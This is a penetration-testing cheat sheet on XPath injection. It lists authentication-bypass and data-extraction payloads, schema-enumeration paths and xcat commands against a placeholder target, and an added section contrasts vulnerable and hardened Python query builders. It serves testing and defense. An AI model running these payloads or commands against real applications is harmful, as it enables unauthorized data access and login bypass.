# XPath injection

## Identification

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/common-xpath-injection-payloads.txt>

## Authentication bypass

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath-injection-authentication-bypass.txt>

## Data exfiltration

```
invalid') or ('1'='1
 | //text()
..//text()
../..//text()
../../..//text()
../../../..//text()
../../../../..//text()
1234 or contains(.,'<text-to-search>')
```
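Defender's view of the payloads above (both the authentication-bypass and the `' or ('1'='1` / `//text()` exfiltration families): they work only because user input is spliced into the XPath expression as raw text. The following is an added example, not part of the original page, showing a vulnerable query builder next to a hardened one that turns any input into a proper XPath 1.0 string literal (using `concat()` when the value contains both quote kinds); `//user[name=... and password=...]` is an assumed document layout, and where the XPath library supports variable binding (e.g. `$user`) that is the preferable fix.

```python
"""Vulnerable vs. hardened XPath login query construction (constructed example)."""


def vulnerable_login_query(user: str, password: str) -> str:
    # Vulnerable: untrusted values are concatenated straight into the expression,
    # so a user of  invalid') or ('1'='1  rewrites the predicate logic.
    return f"//user[name='{user}' and password='{password}']"


def xpath_literal(value: str) -> str:
    """Return a safe XPath 1.0 string literal for an arbitrary value.

    XPath 1.0 has no escape sequence for quotes: a literal is delimited by
    either ' or ", so a value containing both must be assembled with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = []
    for piece in value.split("'"):
        if piece:
            parts.append(f"'{piece}'")
        parts.append('"\'"')  # the single quote that separated the pieces
    parts.pop()  # no separator after the last piece
    return "concat(" + ", ".join(parts) + ")"


def hardened_login_query(user: str, password: str) -> str:
    # Hardened: every value is a literal, so quotes and operators inside it
    # are data, never part of the predicate structure.
    return (
        f"//user[name={xpath_literal(user)} "
        f"and password={xpath_literal(password)}]"
    )


if __name__ == "__main__":
    payload = "invalid') or ('1'='1"  # payload taken from the list above
    print(vulnerable_login_query(payload, "x"))
    print(hardened_login_query(payload, "x"))
```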

### Schema depth

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath_schema_depth_generator.py>

```
| /*[1]
| /*[1]/*[1]
| /*[1]/*[2]
| /*[1]/*[3]
| /*[1]/*[1]/*[1]
| /*[1]/*[1]/*[2]
| /*[1]/*[1]/*[3]
| /*[1]/*[2]/*[1]
| /*[1]/*[2]/*[2]
| /*[1]/*[2]/*[3]
| /*[1]/*[3]/*[1]
| /*[1]/*[3]/*[2]
| /*[1]/*[3]/*[3]
```

### Blind

* <https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/xpath-injection/xpath_injection_blind.py>

## Tools

### XCat

* <https://github.com/orf/xcat>

{% hint style="info" %}
For the vulnerable parameter (`<vulnerable-param>`), supply a sample value that produces a positive result; `<true-condition>` is the string that identifies that positive response.
{% endhint %}

```sh
# GET
xcat run -m GET http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --headers=<headers.txt>
# POST
xcat run -m POST http://<target>/index.php <vulnerable-param> <param1>=<value1> <param2>=<value2> --true-string=<true-condition> --encode=form --headers=<headers.txt>
```
